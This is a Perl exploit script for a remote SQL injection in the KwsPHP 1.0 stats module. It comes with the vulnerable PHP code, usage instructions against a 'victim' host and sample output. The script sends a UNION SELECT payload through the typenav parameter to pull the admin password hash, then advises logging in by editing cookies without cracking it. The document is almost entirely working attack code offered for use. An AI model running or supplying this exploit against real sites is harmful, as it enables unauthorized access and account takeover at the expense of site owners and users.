################################################### # Script..........................: KwsPHP ver 1.0 stats Module # Script Site..................: http://kws.koogar.org/ # Vulnerability...............: Remote SQL injection Exploit # Access.........................: Remote # level.............................: Dangerous # Author..........................: S4mi # Contact.........................: S4mi[at]LinuxMail.org #################################################### #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39 # #################################################### # This Exploit Work Only When magic_quotes_gpc Is OFF # #Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin #Result Screen Shot : #+**********************+ # Connecting ...[OK] # Sending Data ...[OK] # # + Exploit succeed! Getting admin information. # + ---------------- + # + Username: admin # + Password: e10adc3949ba59abbe56e057f20f883e ################################################### #vuln code : \modules\stats\index.php line ~ 700 - 720 #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # [code] # elseif(isset($aff) && ($aff=="browser")) # { # if(isset($typenav)) # { # bloc_head("Statistiques des navigateurs ".$liste_navigateurs[$typenav]); # # $tot_nav=0; # # $requete=reqmysql("SELECT SUM(hit) as tot FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `type` ASC "); # # while ($ligne = mysql_fetch_object($requete)) # { # $tot_nav = $ligne->tot; # } # $requete=reqmysql("SELECT * FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `hit` DESC"); # [/code] ######################################################### #!/usr/bin/perl use IO::Socket ; &header(); &usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2])); $host = $ARGV[0]; $path = $ARGV[1]; $user = $ARGV[2]; syswrite STDOUT ,"\n Connecting ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "\n Unable to connect to $host\n" unless($sock); syswrite STDOUT, "[OK]"; $inject = "9999'/**/UNION/**/SELECT/**/0,0,pass,pseudo/**/FROM/**/users/**/WHERE/**/pseudo='$user'/*"; syswrite STDOUT ,"\n Sending Data ..."; print $sock "POST $path/index.php?mod=stats&aff=browser&typenav=$inject HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Connection: Close\n\n"; syswrite STDOUT ,"[OK]\n\n"; while($answer = <$sock>){ if ($answer =~ /nav_(.*?).png/){ print "+ Exploit succeed! Getting admin information.\n"; print "+ ---------------- +\n"; print "+ Username: $user\n"; print "+ Password: $1\n"; print "+ ----Have Fun---- +\n"; print "+ You don't need to crack the hash password :D\n"; print "+ Just login with ur owen information and edit the cookies\n"; } } sub usage{ print "\nUsage : perl $0 host /path/ UserName "; print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n"; exit(0); } sub header(){ print q( ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script......................: KwsPHP ver 1.0 stats Module # Script Site.................: http://kws.koogar.org/ # Vulnerability...............: Remote SQL injection Exploit # Access......................: Remote # level.......................: Dangerous # Author......................: S4mi # Contact.....................: S4mi[at]LinuxMail.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ); }